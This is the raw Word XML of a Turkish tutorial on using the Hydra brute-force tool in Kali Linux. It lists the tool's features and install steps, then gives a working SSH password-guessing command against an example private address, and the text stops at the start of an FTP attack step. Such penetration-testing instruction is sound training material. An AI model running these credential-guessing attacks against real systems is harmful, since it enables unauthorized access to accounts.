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8677" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D" w:rsidP="0086412D">
      <w:pPr>
        <w:pStyle w:val="p1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">, hızlı ve esnek bir </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>brute-force</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rStyle w:val="s1"/>
          <w:rFonts w:ascii="Helvetica" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Helvetica"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> (kaba kuvvet)</w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> saldırı aracıdır. SSH, FTP, Telnet, HTTP, RDP, SMB gibi birçok servis için kullanıcı adı ve parola kombinasyonlarını deneyerek erişim elde etmeye çalışır. Güçlü sözcük listeleriyle birlikte kullanıldığında zayıf şifreli sistemleri ortaya çıkarmada etkilidir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45298B6E" w14:textId="77777777" w:rsidR="007F3392" w:rsidRPr="0086412D" w:rsidRDefault="007F3392">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7DE406B8" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D" w:rsidP="0086412D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Bu Aracın Özellikleri Nelerdir?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FE2C8B1"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Çok Sayıda Protokol Desteği</w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">: SSH, FTP, HTTP(S), SMB, VNC, Telnet, RDP, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> vb.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A39EDEB"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Paralel İşlem</w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Aynı anda birden fazla kullanıcı/parola kombinasyonunu dener.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B690C04"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proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Wordlist</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Destekli</w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Kendi kullanıcı adı ve parola listelerinizi kullanabilirsiniz.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57FEBF68"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Modüler Yapı</w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Eklenti desteği ile yeni protokoller eklenebilir.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6301DD55"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CLI Tabanlı</w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>: Hızlı ve esnek parametre ayarları.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="226B1A29" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="39405E03" w14:textId="78048AF6" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D" w:rsidP="0086412D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Aracını </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Kali</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Linux’ta Kullanma ve Test Etme Adımları</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="019D248D" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="671CD78F"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t xml:space="preserve">Adım 1: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:sz w:val="27"/>
          <w:szCs w:val="27"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> Yüklü mü Kontrol Et / Gerekirse Kur</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D2E842C" w14:textId="46D09795" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>which</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>” ile kontrol edebilirsin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7178C8CE" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="799AF088" w14:textId="24BCDAD7" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve">Eğer kurulu </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>değilse :</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="123EDB68" w14:textId="0833FAAD" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>update</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> &amp;&amp; </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>sudo</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>apt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>install</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>–y“</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C1736BF" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4375B43D"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t>Adım 2: Basit SSH Brute Force Saldırısı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5683BB3F" w14:textId="6DF888D4" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D" w:rsidP="0086412D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>Örnek hedef: 192.168.1.10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3FCB7C" w14:textId="48D9C1B0" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D" w:rsidP="0086412D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">Kullanıcı </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>listesi: </w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>users.txt</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="34123221" w14:textId="64E84757" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D" w:rsidP="0086412D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="3"/>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Parola listesi: </w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>passwords.txt</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D2164A4" w14:textId="77777777" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D" w:rsidP="0086412D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0BDFEA27" w14:textId="14EF8A35" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D" w:rsidP="0086412D">
      <w:pPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="3"/>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:b/>
          <w:bCs/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> -L users.txt -P passwords.txt </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>ssh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>://192.168.1.10</w:t>
      </w:r>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:eastAsia="Times New Roman" w:hAnsi="Helvetica" w:cs="Times New Roman"/>
          <w:kern w:val="0"/>
          <w:lang w:eastAsia="tr-TR"/>
          <w14:ligatures w14:val="none"/>
        </w:rPr>
        <w:t>”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09346047" w14:textId="24300AEF" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="622035E2" wp14:editId="4B028197">
            <wp:extent cx="5168900" cy="774700"/>
            <wp:effectExtent l="0" t="0" r="0" b="0"/>
            <wp:docPr id="49959252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92523" name="Resim 1" descr="metin, yazı tipi, ekran görüntüsü, çizgi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168900" cy="774700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B55E4FF"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lastRenderedPageBreak/>
        <w:t>Adım 3: FTP Servisine Karşı Saldırı</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CCF558B" w14:textId="77777777" w:rsidR="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="22F275E5" w14:textId="360D06EC" w:rsidR="0086412D" w:rsidRPr="0086412D" w:rsidRDefault="0086412D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="0086412D">
        <w:rPr>
          <w:rFonts w:ascii="Helvetica" w:hAnsi="Helvetica"/>
        </w:rPr>
        <w:t>hydra</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
